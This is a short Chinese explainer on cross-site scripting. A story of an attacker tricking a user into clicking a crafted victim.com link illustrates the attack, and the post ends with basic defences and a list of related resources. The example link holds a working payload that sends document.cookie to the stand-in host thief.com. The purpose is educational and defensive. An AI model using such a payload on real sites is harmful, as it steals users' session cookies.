XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的. 比如获取用户的Cookie,导航到恶意网站,携带木马等。
下面一个例子演示怎样进行XSS攻击:
Tom发现"Victim.com"网站有个XSS漏洞,而Jerry是"Victim.com"的用户,有一天他收到了QQ上的消息,让他点击下面的连接:
http://victim.com/signon.do?term=<script>window.open("http://thief.com?cookie="+document.cookie)</script>
Jerry认为"Victim.com"他经常访问,所以毫不犹豫的点击了连接,后果是Jerry在"Victim.com"的所有cookie信息被Tom窃取。
攻击的过程是三个步骤:
step 1. 诱骗受害人点击钓鱼连接,或者访问钓鱼网站。
step 2. XSS漏洞网站的server端没有对client input做校验,也没有对output做过滤和转码。
step 3. 返回的jsp里面有漏洞参数,上例是"term",当返回到client端后,问题脚本就被执行了。
所以防范XSS攻击也很简单:
A. 对于用户来说,千万小心钓鱼连接和钓鱼网站。
B. 对于我们的网站来说,在server端一定要对input做校验,对output转码!
分享到:
相关推荐
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
简单让你了解xss攻击。 项目基于Asp.net 框架,VS2010下创建,C#语言
XSS攻击常识及常见的XSS攻击脚本汇总
自定义一个Filter拦截器,使用 Filter来过滤浏览器发出的请求,检测每个请求的参数是否含有XSS攻击关键字,如果存在xss攻击关键字,转义特殊字符。 方法是实现一个自定义的 HttpServletRequestWrapper ,然后在 ...
SpringBoot +esapi springSecurity 过滤器链集成 实现防止xss攻击 实战代码
首先说一下思路,防止这种类似于注入攻击,就是使用拦截器(Filter)处理特殊字符或过滤特殊字符 今天介绍一个方法,利用覆盖Servlet的getParameter方法达到处理特殊字符的目的来解决(防止)Xss攻击 web.xml,需要的...
预防xss攻击,过滤标签.js
SpringBoot +esapi 实现防止xss攻击 实战代码,真实有效
防止XSS攻击简单实用的解决办法,直接复制两个过滤器,然后配置web.xml即可实现
网站xss 攻击 代码示例,包括alert弹框,钓鱼网站截取用户cookie信息等;是学习xss的简单示例。可以下载玩玩看看,示例中的钓鱼网站地址为 演示地址,即本资源中的项目地址。xss也是很简单的,可以学习学习
Java防止xss攻击依赖jar包
web安全之XSS攻击及防御,
xss攻击(post)流量数据包
1.处理springboot项目的xss攻击的技术调研文档 2.处理富文本的存储类型的XSS攻击 3.处理URL参数层面的反射类型的XSS攻击
web安全之XSS攻击demo,配合我个人博客使用,谢谢各位的捧场
前端提供一个简单的用户注册表单页面,后端使用node.js搭建,并运用express搭建简单的web应用,通过body-parser解析用户post上来的信息,模拟简单的xss攻击
一种自动生成XSS攻击向量的方法,冯亦彤,罗守山,针对XSS漏洞检测工具在攻击向量选取上的不足,本文提出了一种自动生成XSS攻击向量的方法。为了优化攻击向量的生成,本文从三个方面
所有需要的文件均在里面,超有所值
NULL 博文链接:https://unionhu.iteye.com/blog/1952581